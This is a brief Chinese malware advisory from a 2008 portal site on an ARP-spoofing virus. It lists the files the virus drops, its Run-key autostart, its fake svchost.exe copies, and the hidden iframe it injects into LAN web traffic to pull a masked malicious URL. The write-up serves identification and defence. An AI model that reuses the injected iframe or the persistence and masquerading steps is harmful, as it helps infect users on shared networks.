Win32.Hack.Delf.196608

王朝system·作者佚名  2008-08-14
窄屏简体版  字體: |||超大  

病毒名称(中文):

ARP欺骗196608

病毒别名:

威胁级别:

★★☆☆☆

病毒类型:

网页病毒

病毒长度:

196608

影响系统:

Win9xWinMeWinNTWin2000WinXPWin2003

病毒行为:

这是一个ARP病毒。只要中了该病毒,在局域网内的机器打开浏览器浏览网页时,毒霸会一直报病毒。该病毒

利用传送数据包时嵌入带病毒的HTML代码,访问恶意网址下载恶意病毒。

1.病毒运行后,首先释放以下病毒文件

%Systemroot%system32\Packet.dll

%Systemroot%system32\wpcap.dll

%Systemroot%system32\WanPacket.dll

%Systemroot%system32\Drivers\npf.sys

2.创建自启动

在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下

创建KVP项,启动参数为:C:\WINDOWS\system32\drivers\svchost.exe

3.该病毒会将自身复制到%Systemroot%system32\Drivers\svchost.exe.

并运行%Systemroot%system32\Drivers\svchost.exe,之后又把scvhost.exe

(注:与svchost.exe区分开来),释放到%Systemroot%system32\Drivers目录下.

4.往同一网关内的所有IP的数据包内插入以下HTML代码:

iframesrc='http://www.z****0.com/0.htm'width=0height=0

使局域网其它用户访问其恶意网址.

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
© 2005- 王朝網路 版權所有 導航